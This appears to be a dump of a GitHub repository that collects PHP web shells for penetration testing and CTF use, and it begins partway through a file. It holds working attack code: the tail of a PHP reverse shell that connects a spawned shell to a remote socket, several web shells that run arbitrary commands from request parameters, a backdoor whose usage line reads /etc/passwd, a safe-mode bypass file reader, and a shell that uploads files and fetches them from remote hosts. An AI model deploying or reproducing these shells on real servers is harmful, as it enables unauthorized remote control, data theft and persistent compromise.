110 |    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
111 | );
112 | 
113 | $process = proc_open($shell, $descriptorspec, $pipes);
114 | 
115 | if (!is_resource($process)) {
116 | 	printit("ERROR: Can't spawn shell");
117 | 	exit(1);
118 | }
119 | 
120 | // Set everything to non-blocking
121 | // Reason: Occsionally reads will block, even though stream_select tells us they won't
122 | stream_set_blocking($pipes[0], 0);
123 | stream_set_blocking($pipes[1], 0);
124 | stream_set_blocking($pipes[2], 0);
125 | stream_set_blocking($sock, 0);
126 | 
127 | printit("Successfully opened reverse shell to $ip:$port");
128 | 
129 | while (1) {
130 | 	// Check for end of TCP connection
131 | 	if (feof($sock)) {
132 | 		printit("ERROR: Shell connection terminated");
133 | 		break;
134 | 	}
135 | 
136 | 	// Check for end of STDOUT
137 | 	if (feof($pipes[1])) {
138 | 		printit("ERROR: Shell process terminated");
139 | 		break;
140 | 	}
141 | 
142 | 	// Wait until a command is end down $sock, or some
143 | 	// command output is available on STDOUT or STDERR
144 | 	$read_a = array($sock, $pipes[1], $pipes[2]);
145 | 	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
146 | 
147 | 	// If we can read from the TCP socket, send
148 | 	// data to process's STDIN
149 | 	if (in_array($sock, $read_a)) {
150 | 		if ($debug) printit("SOCK READ");
151 | 		$input = fread($sock, $chunk_size);
152 | 		if ($debug) printit("SOCK: $input");
153 | 		fwrite($pipes[0], $input);
154 | 	}
155 | 
156 | 	// If we can read from the process's STDOUT
157 | 	// send data down tcp connection
158 | 	if (in_array($pipes[1], $read_a)) {
159 | 		if ($debug) printit("STDOUT READ");
160 | 		$input = fread($pipes[1], $chunk_size);
161 | 		if ($debug) printit("STDOUT: $input");
162 | 		fwrite($sock, $input);
163 | 	}
164 | 
165 | 	// If we can read from the process's STDERR
166 | 	// send data down tcp connection
167 | 	if (in_array($pipes[2], $read_a)) {
168 | 		if ($debug) printit("STDERR READ");
169 | 		$input = fread($pipes[2], $chunk_size);
170 | 		if ($debug) printit("STDERR: $input");
171 | 		fwrite($sock, $input);
172 | 	}
173 | }
174 | 
175 | fclose($sock);
176 | fclose($pipes[0]);
177 | fclose($pipes[1]);
178 | fclose($pipes[2]);
179 | proc_close($process);
180 | 
181 | // Like print, but does nothing if we've daemonised ourself
182 | // (I can't figure out how to redirect STDOUT like a proper daemon)
183 | function printit ($string) {
184 | 	if (!$daemon) {
185 | 		print "$string\n";
186 | 	}
187 | }
188 | 
189 | ?> 
190 | 
191 | 
192 | 
193 | 


--------------------------------------------------------------------------------
/Collection/php-web-shell.php:
--------------------------------------------------------------------------------
 1 | PHP Web Shell
 2 | 
 3 | 
 4 |     
 5 |     
13 |     
14 |     
15 |     

16 |         Command
17 |         
18 |     

19 |     
20 |     
21 |     Executed:  $decoded_command";
24 |         echo str_repeat("
",2);
25 |         echo "Output:";
26 |         echo str_repeat("
",2);
27 |         exec($decoded_command . " 2>&1", $output, $return_status);
28 |         if (isset($return_status)):
29 |             if ($return_status !== 0):
30 |                 echo "Error in Code Execution -->  ";
31 |                 foreach ($output as &$line) {
32 |                     echo "$line 
";
33 |                 };
34 |             elseif ($return_status == 0 && empty($output)):
35 |                 echo "Command ran successfully, but does not have any output.";
36 |             else:
37 |                 foreach ($output as &$line) {
38 |                     echo "$line 
";
39 |                 };
40 |             endif;
41 |         endif;
42 |     ?>
43 | 
44 | 
45 | 


--------------------------------------------------------------------------------
/Collection/pws.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
Input command :

 4 | 

 5 | 

 6 | 
 7 | 
13 | 

14 | 

15 | 
Uploader file :

16 | 
17 |      

27 | 
28 |  ">
29 |  
30 |  
31 | 	  
32 |     
33 | 
34 | 
35 | 
36 | 


--------------------------------------------------------------------------------
/Collection/robots.php:
--------------------------------------------------------------------------------
1 | User-agent: *
2 | Allow: /#Begin Attracta SEO Tools Sitemap. Do not remove
3 | sitemap: http://cdn.attracta.com/sitemap/2519186.xml.gz
4 | #End Attracta SEO Tools Sitemap. Do not remove
5 | 


--------------------------------------------------------------------------------
/Collection/rootshell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/rootshell.php


--------------------------------------------------------------------------------
/Collection/ru24_post_sh.php:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | Ru24PostWebShell - ".$_POST['cmd']."
13 | 
14 | ";
15 | echo "";
16 | echo "";
17 | echo "";
18 | echo "
";
19 | if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
20 | echo "".$function($_POST['cmd'])."
";
21 | 
22 | 
23 | ?>
24 | 


--------------------------------------------------------------------------------
/Collection/s72_Shell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/s72_Shell.php


--------------------------------------------------------------------------------
/Collection/safe0ver.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/safe0ver.php


--------------------------------------------------------------------------------
/Collection/simple-backdoor.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | ";
 7 |         $cmd = ($_REQUEST['cmd']);
 8 |         system($cmd);
 9 |         echo "
";
10 |         die;
11 | }
12 | 
13 | ?>
14 | 
15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
16 | 
17 | 
18 | 


--------------------------------------------------------------------------------
/Collection/simple_cmd.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | G-Security Webshell
 4 | 
 5 | 
 6 | 
 7 | 

 8 | 

 9 | 
11 | 

12 | 
13 | 
14 | 
15 | 

16 | 

17 | 
18 | 
  3 |  	
  4 |  	
  9 |  	
 12 |  	
SpyGrup Safe Mod:ON Fucker 
RFI Olarak Kullanilmaz .PHP Olarak Host'a Yukleyiniz

 13 |  	

 14 |  	

 15 |  	    
Okunacak Dosya:
 16 |  	    
 17 |  	    

 18 |  	

 19 |  	    

 20 |  	        
Sunucu Bilgileri:  

 26 |  	         
 27 |                                
 32 |  	*/
 33 |  	
 34 |  
 35 |  
 36 |  	$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
 37 |  
 38 |  	if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
 39 |  	{
 40 |  	 $safemode = true;
 41 |  	 $hsafemode = "Açik (Güvenli)";
 42 |  	}
 43 |  	else {$safemode = false; $hsafemode = "Kapali (Güvenli Degil)";}
 44 |  	echo("Güvenlik: $hsafemode");
 45 |  	$v = @ini_get("open_basedir");
 46 |  	if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}
 47 |  	else {$openbasedir = false; $hopenbasedir = "Kapali (Güvenli Degil)";}
 48 |  	echo("
");
 49 |  	echo("Klasörler Arasi Dolasim: $hopenbasedir");
 50 |  	echo("
");
 51 |  	$version=("Bypass Version 1.1 Beta");
 52 |  	echo "Engelleyici Program : ";
 53 |  	if(''==($df=@ini_get('disable_functions'))){echo "Görünürde Bişiy Yok";}else{echo "$df";}
 54 |  	$free = @diskfreespace($dir);
 55 |  	if (!$free) {$free = 0;}
 56 |  	$all = @disk_total_space($dir);
 57 |  	if (!$all) {$all = 0;}
 58 |  	$used = $all-$free;
 59 |  	$used_percent = @round(100/($all/$free),2);
 60 |  	  error_reporting(E_WARNING);
 61 |  	  ini_set("display_errors", 1);
 62 |  	
 63 |  
 64 |  	  echo "".getcwd()."";
 65 |  
 66 |  	  echo"
";
 67 |  	  echo("
");
 68 |  	        echo "
";
 69 |  	  echo "
ByPass Edilecek Dizin: 
";
 70 |  	  echo "
";
 71 |  
 72 |  
 73 |  	  $root = "./";
 74 |  
 75 |  	  if($_POST['root']) $root = $_POST['root'];
 76 |  	               if($_GET['root']) $root = $_GET['root'];
 77 |  	  if (!ini_get('safe_mode')) die("Safe-mode  OFF.");
 78 |  
 79 |  	  $c = 0; $D = array();
 80 |  	  set_error_handler("eh");
 81 |  
 82 |  	  $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
 83 |  
 84 |  	  for($i=0; $i < strlen($chars); $i++){
 85 |  	  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
 86 |  
 87 |  	  $prevD = $D[count($D)-1];
 88 |        glob($path."*");
 89 |  
 90 |  	        if($D[count($D)-1] != $prevD){
 91 |  
 92 |  	        for($j=0; $j < strlen($chars); $j++){
 93 |  
 94 |  	           $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
 95 |  
 96 |  	           $prevD2 = $D[count($D)-1];
 97 |  	           glob($path."*");
 98 |  
 99 |  	              if($D[count($D)-1] != $prevD2){
100 |  
101 |  
102 |  	                 for($p=0; $p < strlen($chars); $p++){
103 |  
104 |  	                 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
105 |  
106 |  	                 $prevD3 = $D[count($D)-1];
107 |  	                 glob($path."*");
108 |  
109 |  	                    if($D[count($D)-1] != $prevD3){
110 |  
111 |  
112 |  	                       for($r=0; $r < strlen($chars); $r++){
113 |  
114 |  	                       $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
115 |  	                       glob($path."*");
116 |  
117 |  	                       }
118 |  
119 |  	                    }
120 |  
121 |  	                 }
122 |  
123 |  	              }
124 |  
125 |  	        }
126 |  
127 |  	        }
128 |  
129 |  	  }
130 |  
131 |  	  $D = array_unique($D);
132 |  
133 |  	  echo "";
134 |  	  foreach($D as $item) echo "{$item}\n";
135 |  	  echo "";
136 |  
137 |  
138 |  
139 |  
140 |  	  function eh($errno, $errstr, $errfile, $errline){
141 |  
142 |  	     global $D, $c, $i;
143 |  	     preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
144 |  	     if($o){ $D[$c] = $o[2]; $c++;}
145 |  
146 |  	  }
147 |  	echo "
\n";
148 |  	if(empty($file)){
149 |  	if(empty($_GET['file'])){
150 |  	if(empty($_POST['file'])){
151 |  	die("\nHosgeldiniz...Bu Scriptle Sadece c99'da  (Safe Mode=ON) Olan Serverlarda Bypass Yapilabilir Digerlerinde Calismaz  .. Kolay Gelsin\n 

153 |  	kingdefacer@msn.com
");
154 |  	} else {
155 |  	$file=$_POST['file'];
156 |  	}
157 |  	} else {
158 |  	$file=$_GET['file'];
159 |  	}
160 |  	}
161 |  
162 |  	$temp=tempnam($tymczas, "cx");
163 |  
164 |  	if(copy("compress.zlib://".$file, $temp)){
165 |  	$zrodlo = fopen($temp, "r");
166 |  	$tekst = fread($zrodlo, filesize($temp));
167 |  	fclose($zrodlo);
168 |  	 echo"
";
169 |  	echo "--- Start File ".htmlspecialchars($file)."
170 |  	-------------\n".htmlspecialchars($tekst)."\n--- End File
171 |  	".htmlspecialchars($file)." ---------------\n";
172 |  	unlink($temp);
173 |  	die("\nFile
174 |  	".htmlspecialchars($file)." Bu Dosya zaten Goruntuleniyor
175 |  	;]");
176 |  	} else {
177 |  	die("
Uzgunum...
178 |  	".htmlspecialchars($file)." Aradiginiz dosya Bulunamadi
179 |  	access.
");
180 |  	}
181 |  
182 |  	?>


--------------------------------------------------------------------------------
/Collection/stres.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/stres.php


--------------------------------------------------------------------------------
/Collection/toolaspshell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/toolaspshell.php


--------------------------------------------------------------------------------
/Collection/tryag.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/tryag.php


--------------------------------------------------------------------------------
/Collection/wwwolf-webshell.php:
--------------------------------------------------------------------------------
  1 | #.
 20 |  ******************************************************************************/
 21 | 
 22 | /*
 23 |  * Optional password settings.
 24 |  * Use the 'passhash.sh' script to generate the hash.
 25 |  * NOTE: the prompt value is tied to the hash!
 26 |  */
 27 | $passprompt = "WhiteWinterWolf's PHP webshell: ";
 28 | $passhash = "";
 29 | 
 30 | function e($s) { echo htmlspecialchars($s, ENT_QUOTES); }
 31 | 
 32 | function h($s)
 33 | {
 34 | 	global $passprompt;
 35 | 	if (function_exists('hash_hmac'))
 36 | 	{
 37 | 		return hash_hmac('sha256', $s, $passprompt);
 38 | 	}
 39 | 	else
 40 | 	{
 41 | 		return bin2hex(mhash(MHASH_SHA256, $s, $passprompt));
 42 | 	}
 43 | }
 44 | 
 45 | function fetch_fopen($host, $port, $src, $dst)
 46 | {
 47 | 	global $err, $ok;
 48 | 	$ret = '';
 49 | 	if (strpos($host, '://') === false)
 50 | 	{
 51 | 		$host = 'http://' . $host;
 52 | 	}
 53 | 	else
 54 | 	{
 55 | 		$host = str_replace(array('ssl://', 'tls://'), 'https://', $host);
 56 | 	}
 57 | 	$rh = fopen("${host}:${port}${src}", 'rb');
 58 | 	if ($rh !== false)
 59 | 	{
 60 | 		$wh = fopen($dst, 'wb');
 61 | 		if ($wh !== false)
 62 | 		{
 63 | 			$cbytes = 0;
 64 | 			while (! feof($rh))
 65 | 			{
 66 | 				$cbytes += fwrite($wh, fread($rh, 1024));
 67 | 			}
 68 | 			fclose($wh);
 69 | 			$ret .= "${ok} Fetched file ${dst} (${cbytes} bytes)
";
 70 | 		}
 71 | 		else
 72 | 		{
 73 | 			$ret .= "${err} Failed to open file ${dst}
";
 74 | 		}
 75 | 		fclose($rh);
 76 | 	}
 77 | 	else
 78 | 	{
 79 | 		$ret = "${err} Failed to open URL ${host}:${port}${src}
";
 80 | 	}
 81 | 	return $ret;
 82 | }
 83 | 
 84 | function fetch_sock($host, $port, $src, $dst)
 85 | {
 86 | 	global $err, $ok;
 87 | 	$ret = '';
 88 | 	$host = str_replace('https://', 'tls://', $host);
 89 | 	$s = fsockopen($host, $port);
 90 | 	if ($s)
 91 | 	{
 92 | 		$f = fopen($dst, 'wb');
 93 | 		if ($f)
 94 | 		{
 95 | 			$buf = '';
 96 | 			$r = array($s);
 97 | 			$w = NULL;
 98 | 			$e = NULL;
 99 | 			fwrite($s, "GET ${src} HTTP/1.0\r\n\r\n");
100 | 			while (stream_select($r, $w, $e, 5) && !feof($s))
101 | 			{
102 | 				$buf .= fread($s, 1024);
103 | 			}
104 | 			$buf = substr($buf, strpos($buf, "\r\n\r\n") + 4);
105 | 			fwrite($f, $buf);
106 | 			fclose($f);
107 | 			$ret .= "${ok} Fetched file ${dst} (" . strlen($buf) . " bytes)
";
108 | 		}
109 | 		else
110 | 		{
111 | 			$ret .= "${err} Failed to open file ${dst}
";
112 | 		}
113 | 		fclose($s);
114 | 	}
115 | 	else
116 | 	{
117 | 		$ret .= "${err} Failed to connect to ${host}:${port}
";
118 | 	}
119 | 	return $ret;
120 | }
121 | 
122 | ini_set('log_errors', '0');
123 | ini_set('display_errors', '1');
124 | error_reporting(E_ALL);
125 | 
126 | while (@ ob_end_clean());
127 | 
128 | if (! isset($_SERVER))
129 | {
130 | 	global $HTTP_POST_FILES, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
131 | 	$_FILES = &$HTTP_POST_FILES;
132 | 	$_POST = &$HTTP_POST_VARS;
133 | 	$_SERVER = &$HTTP_SERVER_VARS;
134 | }
135 | 
136 | $auth = '';
137 | $cmd = empty($_POST['cmd']) ? '' : $_POST['cmd'];
138 | $cwd = empty($_POST['cwd']) ? getcwd() : $_POST['cwd'];
139 | $fetch_func = 'fetch_fopen';
140 | $fetch_host = empty($_POST['fetch_host']) ? $_SERVER['REMOTE_ADDR'] : $_POST['fetch_host'];
141 | $fetch_path = empty($_POST['fetch_path']) ? '' : $_POST['fetch_path'];
142 | $fetch_port = empty($_POST['fetch_port']) ? '80' : $_POST['fetch_port'];
143 | $pass = empty($_POST['pass']) ? '' : $_POST['pass'];
144 | $url = $_SERVER['REQUEST_URI'];
145 | $status = '';
146 | $ok = '☺ :';
147 | $warn = '⚠ :';
148 | $err = '☹ :';
149 | 
150 | if (! empty($passhash))
151 | {
152 | 	if (function_exists('hash_hmac') || function_exists('mhash'))
153 | 	{
154 | 		$auth = empty($_POST['auth']) ? h($pass) : $_POST['auth'];
155 | 		if (h($auth) !== $passhash)
156 | 		{
157 | 			?>
158 | 				

159 | 					
160 | 					
161 | 					
162 | 				

163 | 			";
170 | 	}
171 | }
172 | 
173 | if (! ini_get('allow_url_fopen'))
174 | {
175 | 	ini_set('allow_url_fopen', '1');
176 | 	if (! ini_get('allow_url_fopen'))
177 | 	{
178 | 		if (function_exists('stream_select'))
179 | 		{
180 | 			$fetch_func = 'fetch_sock';
181 | 		}
182 | 		else
183 | 		{
184 | 			$fetch_func = '';
185 | 			$status .= "${warn} File fetching disabled ('allow_url_fopen'"
186 | 				. " disabled and 'stream_select()' missing).
";
187 | 		}
188 | 	}
189 | }
190 | if (! ini_get('file_uploads'))
191 | {
192 | 	ini_set('file_uploads', '1');
193 | 	if (! ini_get('file_uploads'))
194 | 	{
195 | 		$status .= "${warn} File uploads disabled.
";
196 | 	}
197 | }
198 | if (ini_get('open_basedir') && ! ini_set('open_basedir', ''))
199 | {
200 | 	$status .= "${warn} open_basedir = " . ini_get('open_basedir') . "
";
201 | }
202 | 
203 | if (! chdir($cwd))
204 | {
205 |   $cwd = getcwd();
206 | }
207 | 
208 | if (! empty($fetch_func) && ! empty($fetch_path))
209 | {
210 | 	$dst = $cwd . DIRECTORY_SEPARATOR . basename($fetch_path);
211 | 	$status .= $fetch_func($fetch_host, $fetch_port, $fetch_path, $dst);
212 | }
213 | 
214 | if (ini_get('file_uploads') && ! empty($_FILES['upload']))
215 | {
216 | 	$dest = $cwd . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']);
217 | 	if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest))
218 | 	{
219 | 		$status .= "${ok} Uploaded file ${dest} (" . $_FILES['upload']['size'] . " bytes)
";
220 | 	}
221 | }
222 | ?>
223 | 
224 | 

226 | 		enctype="multipart/form-data"
227 | 	
228 | 	>
229 | 	
230 | 		
231 | 	
232 | 	
233 | 		
234 | 			
241 | 		
242 | 		
250 | 		
255 | 		
259 | 		
262 | 	

235 | 				Fetch:
236 | 			
237 | 				host: 
238 | 				port: 
239 | 				path: 
240 | 			

243 | 			CWD:
244 | 		
245 | 			
246 | 			
247 | 				Upload: 
248 | 			
249 | 		

251 | 			Cmd:
252 | 		
253 | 			
254 | 		

256 | 		
257 | 			Clear cmd
258 | 		

260 | 			
261 | 		

263 | 	
264 | 

265 | 

266 | 
267 | ${status}
";
271 | }
272 | 
273 | echo "
";
274 | if (! empty($cmd))
275 | {
276 | 	echo "";
277 | 	e($cmd);
278 | 	echo "\n";
279 | 	if (DIRECTORY_SEPARATOR == '/')
280 | 	{
281 | 		$p = popen('exec 2>&1; ' . $cmd, 'r');
282 | 	}
283 | 	else
284 | 	{
285 | 		$p = popen('cmd /C "' . $cmd . '" 2>&1', 'r');
286 | 	}
287 | 	while (! feof($p))
288 | 	{
289 | 		echo htmlspecialchars(fread($p, 4096), ENT_QUOTES);
290 | 		@ flush();
291 | 	}
292 | }
293 | echo "
";
294 | 
295 | exit;
296 | ?>
297 | 


--------------------------------------------------------------------------------
/Collection/zehir4.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/zehir4.php


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | Contributing
 2 | ============
 3 | 
 4 | To contribute other shells not listed here... Fork, Push the changes to your repo, then before you request for a Pull, make sure to include a simple description of your **php** web-shell and include a screen-shot of the web-shell (as hosted in your localhost).
 5 | 
 6 | PHP Webshells
 7 | =============
 8 | 
 9 | Common PHP shells is a collection of PHP webshells that you may need for your penetration testing (PT) cases or in a CTF challenge. 
10 | 
11 | Do not host any of the files on a publicly-accessible webserver (unless you know what you are up-to).
12 | 
13 | These are provided for education purposes only and legitimate PT cases.
14 | 
15 | I'll keep updating the collection whnever I stumble on any new webshell.
16 | 
17 | FYI
18 | ====
19 | 
20 | 
21 | For basic features, I recommend one-liners like :
22 | 
23 | ``
24 | 
25 | ``
26 | 
27 | ``
28 | 
29 | ``
30 | 
31 | 
32 | Cite:
33 | =====
34 | 
35 | ```
36 | @software{jacques_pharand_2020_3748072,
37 |   author       = {Jacques Pharand and
38 |                   John Troon and
39 |                   Javier Izquierdo Vera},
40 |   title        = {JohnTroony/php-webshells: Collection CS1},
41 |   month        = apr,
42 |   year         = 2020,
43 |   publisher    = {Zenodo},
44 |   version      = {1.1},
45 |   doi          = {10.5281/zenodo.3748072},
46 |   url          = {https://doi.org/10.5281/zenodo.3748072}
47 | }
48 | 
49 | ```
50 | 


--------------------------------------------------------------------------------